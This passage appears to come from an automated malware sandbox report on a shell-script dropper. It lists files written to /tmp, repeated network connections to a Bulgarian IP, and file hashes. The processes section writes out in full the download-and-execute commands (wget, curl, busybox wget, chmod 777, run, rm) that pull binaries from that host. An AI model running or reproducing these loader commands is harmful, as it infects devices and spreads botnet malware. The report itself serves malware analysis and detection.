| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z | /usr/bin/curl | N/A |
| File opened for modification | /tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G | /usr/bin/curl | N/A |
Processes
/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh
[/tmp/a64f1035faff5f9538e78ad38d0311b34f4715ab356a1c23908ef8b7fe0e8b5f.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/chmod
[chmod 777 UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/tmp/UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm
[./UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/bin/rm
[rm UEgQT9m3WX3kva37ht7UZsgw9xjpzOOLSm]
/usr/bin/wget
[wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/chmod
[chmod 777 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/tmp/3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6
[./3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/bin/rm
[rm 3iDcm41EWcKaMhQD8lzQRBHNn3zyg4bns6]
/usr/bin/wget
[wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/chmod
[chmod 777 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/tmp/6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn
[./6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/bin/rm
[rm 6tNBriFC2AOibUG6vjDJJR1VULNOIHpapn]
/usr/bin/wget
[wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/chmod
[chmod 777 L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/tmp/L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM
[./L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/bin/rm
[rm L2TgpFoDXxhUo9MLIpad7ptPt4SNo9x4PM]
/usr/bin/wget
[wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/chmod
[chmod 777 Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/tmp/Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z
[./Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/bin/rm
[rm Y4d9Rc02s5S1TC5d0xe1Z53jmgYfWaLG3z]
/usr/bin/wget
[wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/chmod
[chmod 777 TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/tmp/TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ
[./TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/bin/rm
[rm TJ5LtzTWs8omHcniedNVc5eK6HbgIPSIYZ]
/usr/bin/wget
[wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/chmod
[chmod 777 nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/tmp/nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc
[./nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/bin/rm
[rm nCucIrzHaAbO3wxaMfCyL98wydNfGmKFQc]
/usr/bin/wget
[wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/chmod
[chmod 777 C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/tmp/C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD
[./C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/bin/rm
[rm C9Bqa0JTEoCtvWndyFctHZ4YlCPBedVKhD]
/usr/bin/wget
[wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/chmod
[chmod 777 tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/tmp/tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs
[./tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/bin/rm
[rm tfWaybWJUVOKrAkkw6wUsjdnfo2FoC1JMs]
/usr/bin/wget
[wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/chmod
[chmod 777 B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/tmp/B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs
[./B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/bin/rm
[rm B9tKithJtx2VaxOgudRvH49IF0LUCjuBWs]
/usr/bin/wget
[wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/chmod
[chmod 777 ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/tmp/ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G
[./ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/bin/rm
[rm ZX19oe3AxCd9Tdv6bYxnhhczKTaB6N8J8G]
/usr/bin/wget
[wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/chmod
[chmod 777 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
[./1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/bin/rm
[rm 1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls]
/usr/bin/wget
[wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/chmod
[chmod 777 zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/tmp/zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb
[./zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/bin/rm
[rm zTG9TPuN9msEZeJREXnkTGRUNLM1dMQvBb]
/usr/bin/wget
[wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/usr/bin/curl
[curl -O http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/busybox
[/bin/busybox wget http://87.120.125.191/bins/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/chmod
[chmod 777 p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/tmp/p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe
[./p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
/bin/rm
[rm p4MDg5xu0wQBOcueeu3E0uL6kXzLF9fKhe]
Network
| Country | Destination | Domain | Proto |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
| BG | 87.120.125.191:80 | 87.120.125.191 | tcp |
Files
/tmp/1rQQQWtspmL1kpT95bhh7hVyerI0m3O9Ls
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
